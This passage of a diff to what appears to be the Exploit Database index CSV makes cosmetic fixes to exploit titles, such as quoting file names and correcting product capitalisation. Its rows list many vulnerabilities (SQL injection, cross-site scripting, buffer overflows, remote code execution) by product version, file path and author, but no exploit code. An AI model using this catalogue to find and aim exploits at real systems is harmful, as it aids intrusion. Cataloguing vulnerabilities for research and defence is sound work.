.PNM Image Decoding Remote Buffer Overflow",2005-04-25,"Damian Put",linux,dos,0 @@ -22688,7 +22690,7 @@ id,file,description,date,author,platform,type,port 25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' P Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Q Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25557,platforms/windows/remote/25557.txt,"HP OpenView Radia Management Portal 1.0/2.0 - Remote Command Execution",2005-04-28,"David Morgan",windows,remote,0 -25558,platforms/php/webapps/25558.txt,"Notes Module for PHPBB - SQL Injection",2005-04-28,"James Bercegay",php,webapps,0 +25558,platforms/php/webapps/25558.txt,"Notes Module for phpBB - SQL Injection",2005-04-28,"James Bercegay",php,webapps,0 25559,platforms/multiple/remote/25559.txt,"Oracle Application Server 9.0 - HTTP Service Mod_Access Restriction Bypass",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore - Closeup.php Image Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25561,platforms/multiple/remote/25561.txt,"Oracle Application Server 9i Webcache - Arbitrary File Corruption",2005-04-28,"Alexander Kornbrust",multiple,remote,0 @@ -22698,7 +22700,7 @@ id,file,description,date,author,platform,type,port 25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - SearchFor Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25566,platforms/php/webapps/25566.txt,"Just William's Amazon Webstore - CurrentNumber Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 -25568,platforms/php/webapps/25568.txt,"PHPCOIN 1.2 - login.php PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 +25568,platforms/php/webapps/25568.txt,"PHPCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - ID Variable SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 25571,platforms/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal",2005-05-02,"Donato Ferrante",windows,remote,0 @@ -22706,7 +22708,7 @@ id,file,description,date,author,platform,type,port 25573,platforms/windows/remote/25573.txt,"Video Cam Server 1.0 - Administrative Interface Authentication Bypass",2005-05-02,"Donato Ferrante",windows,remote,0 25574,platforms/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client - Remote Format String",2005-05-02,"Luigi Auriemma",multiple,remote,0 25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - basket.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 -25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - page.php page Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 +25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php' page Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - reviews.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25578,platforms/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - product_details.php category_id Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25579,platforms/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - products.php Multiple Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 @@ -22762,7 +22764,7 @@ id,file,description,date,author,platform,type,port 25625,platforms/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2)",2005-05-11,K-sPecial,unix,remote,0 25626,platforms/osx/remote/25626.c,"4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow",2005-05-06,"Braden Thomas",osx,remote,0 25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload",2005-05-06,tjomi4,php,remote,0 -25628,platforms/jsp/webapps/25628.txt,"PHPBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0 +25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0 25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,windows,dos,0 25630,platforms/php/webapps/25630.txt,"Advanced GuestBook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - CGISSI.exe Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos,0 @@ -22838,9 +22840,9 @@ id,file,description,date,author,platform,type,port 25700,platforms/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 25701,platforms/asp/webapps/25701.txt,"Spread The Word - Multiple SQL Injections",2005-05-24,Lostmon,asp,webapps,0 25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 -25703,platforms/solaris/local/25703.txt,"Active News Manager - login.asp SQL Injection",2005-05-25,Romty,solaris,local,0 +25703,platforms/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,solaris,local,0 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 -25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - login.asp SQL Injection",2005-05-25,Romty,asp,webapps,0 +25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps,0 25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 - Mail Email Header Buffer Overflow",2004-08-10,infamous41md,linux,remote,0 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server - Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 @@ -22849,7 +22851,7 @@ id,file,description,date,author,platform,type,port 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution",2013-05-26,rgod,windows,dos,0 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx Remote Code Execution",2013-05-26,rgod,windows,remote,0 -25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 +25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - (index.php module parameter) Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 @@ -22883,7 +22885,7 @@ id,file,description,date,author,platform,type,port 25748,platforms/php/webapps/25748.txt,"NPDS 4.8 - /5.0 Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 25749,platforms/php/webapps/25749.txt,"NPDS 4.8 - /5.0 links.php Query Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 25750,platforms/php/webapps/25750.txt,"NPDS 4.8 - /5.0 faq.php categories Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25751,platforms/asp/webapps/25751.txt,"OS4E - login.asp SQL Injection",2005-05-28,"Dj romty",asp,webapps,0 +25751,platforms/asp/webapps/25751.txt,"OS4E - 'login.asp' SQL Injection",2005-05-28,"Dj romty",asp,webapps,0 25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 - Data() Function Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 - resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 - plandetails.asp Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 @@ -22925,17 +22927,17 @@ id,file,description,date,author,platform,type,port 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 -25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - login.asp SQL Injection",2005-06-01,Romty,asp,webapps,0 -25781,platforms/asp/webapps/25781.txt,"NEXTWEB - (i)Site login.asp SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 +25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - 'login.asp' SQL Injection",2005-06-01,Romty,asp,webapps,0 +25781,platforms/asp/webapps/25781.txt,"NEXTWEB - (i)Site 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 - Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 -25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - login.asp SQL Injection",2005-06-01,"Dj romty",asp,webapps,0 +25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",asp,webapps,0 25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injections",2005-06-02,"Dedi Dwianto",asp,webapps,0 25786,platforms/php/webapps/25786.txt,"MWChat 6.7 - Start_Lobby.php Remote File Inclusion",2005-06-03,Status-x,php,webapps,0 25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",php,webapps,0 25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",linux,local,0 -25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - login.asp SQL Injection",2005-06-06,Romty,asp,webapps,0 +25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,asp,webapps,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos,0 25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Remote File Inclusion / Local File Inclusion",2005-06-06,anonymous,php,webapps,0 25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x - view.php Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0 @@ -22974,7 +22976,7 @@ id,file,description,date,author,platform,type,port 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0 25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0 25838,platforms/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",php,webapps,0 -25839,platforms/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - login.asp SQL Injection",2005-06-16,"Morning Wood",asp,webapps,0 +25839,platforms/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection",2005-06-16,"Morning Wood",asp,webapps,0 25840,platforms/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",php,webapps,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 @@ -22982,7 +22984,7 @@ id,file,description,date,author,platform,type,port 25844,platforms/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - blog_comment.asp y Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 25845,platforms/asp/webapps/25845.txt,"Uapplication Ublog Reload 1.0.5 - Trackback.asp Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 -25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - login.asp SQL Injection",2003-12-07,G00db0y,asp,webapps,0 +25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts - Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 @@ -23012,7 +23014,7 @@ id,file,description,date,author,platform,type,port 25871,platforms/asp/webapps/25871.txt,"DUware DUforum 3.0/3.1 - userEdit.asp id Parameter SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps,0 25872,platforms/asp/webapps/25872.txt,"DUware DUclassmate 1.x - default.asp iState Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25873,platforms/asp/webapps/25873.txt,"DUware DUclassmate 1.x - edit.asp iPro Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 -25874,platforms/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 - login.asp SQL Injection",2005-06-22,anonymous,asp,webapps,0 +25874,platforms/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 - 'login.asp' SQL Injection",2005-06-22,anonymous,asp,webapps,0 25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x - profile.php Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",php,webapps,0 25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - menu_footer.php Multiple Parameter Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 25877,platforms/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 - IMG Tag Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps,0 @@ -23053,7 +23055,7 @@ id,file,description,date,author,platform,type,port 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service",2005-06-28,fRoGGz,windows,dos,0 25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 - error.asp Cross-Site Scripting",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 -25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - login.asp SQL Injection",2005-06-28,basher13,asp,webapps,0 +25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' SQL Injection",2005-06-28,basher13,asp,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection",2013-06-03,drone,php,webapps,0 25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x - Graph_Image.php Remote Command Execution Variant",2005-07-01,"Alberto Trivero",php,webapps,0 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0 @@ -23084,7 +23086,7 @@ id,file,description,date,author,platform,type,port 25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0 25943,platforms/linux/dos/25943.txt,"OFTPD 0.3.x - User Command Buffer Overflow",2005-07-06,new.security@gmail.com,linux,dos,0 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 - Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote,0 -25945,platforms/php/webapps/25945.txt,"PHPWebsite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0 +25945,platforms/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite",2005-07-06,pi3ki31ny,linux,local,0 25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,cgi,webapps,0 @@ -23108,7 +23110,7 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - Remote Code Execution Exploit",2013-06-05,eKKiM,linux,remote,0 -25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig parameter'Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 +25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 - (tinybrowser.php folder parameter) Path Traversal",2013-06-05,expl0i13r,php,webapps,0 25974,platforms/osx/dos/25974.txt,"Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 @@ -23188,7 +23190,7 @@ id,file,description,date,author,platform,type,port 26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 - profile.php UserName Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 -26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - login.php UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 +26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php' username Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0 26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 @@ -23253,7 +23255,7 @@ id,file,description,date,author,platform,type,port 26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - boardhelp.asp Multiple Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0 -26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - login.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 +26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - subscribe.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - search.php Cross-Site Scripting",2005-08-08,almaster,php,webapps,0 @@ -23311,7 +23313,7 @@ id,file,description,date,author,platform,type,port 26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - msdds.dll Remote Code Execution",2005-08-17,anonymous,windows,remote,0 26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 - Site Parameter Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 -26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - login.php course Parameter Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 +26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0 @@ -23381,7 +23383,7 @@ id,file,description,date,author,platform,type,port 26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps,0 26240,platforms/php/webapps/26240.txt,"Ultimate Wordpress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps,0 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 -26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax'SEH Buffer Overflow",2013-06-17,Onying,windows,local,0 +26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' SEH Buffer Overflow",2013-06-17,Onying,windows,local,0 26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 26244,platforms/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",php,webapps,0 26245,platforms/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0 @@ -23633,7 +23635,7 @@ id,file,description,date,author,platform,type,port 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injection",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 -26512,platforms/php/webapps/26512.txt,"PHPwcms 1.2.5 -DEV - login.php form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 +26512,platforms/php/webapps/26512.txt,"PHPwcms 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26513,platforms/php/webapps/26513.txt,"PHPwcms 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 @@ -23641,12 +23643,12 @@ id,file,description,date,author,platform,type,port 26517,platforms/windows/dos/26517.txt,"Microsoft PowerPoint 2007 - Crash (PoC)",2013-07-01,Asesino04,windows,dos,0 26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 - design.php delete Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26519,platforms/windows/dos/26519.py,"AVS Media Player 4.1.11.100 - '.ac3'Denial of Service",2013-07-01,metacom,windows,dos,0 +26519,platforms/windows/dos/26519.py,"AVS Media Player 4.1.11.100 - '.ac3' Denial of Service",2013-07-01,metacom,windows,dos,0 26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - SEH Overflow",2013-07-01,"Jacob Holcomb",windows,local,0 26521,platforms/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,php,webapps,0 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0 27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php' st Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 -26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx'SEH Buffer Overflow",2013-07-01,MrXors,windows,local,0 +26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' SEH Buffer Overflow",2013-07-01,MrXors,windows,local,0 26526,platforms/windows/dos/26526.py,"VLC Media Player 2.0.7 - (.png) Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",hardware,webapps,0 @@ -23679,7 +23681,7 @@ id,file,description,date,author,platform,type,port 26555,platforms/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos,0 26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 - customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 -26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack-based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 +26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack 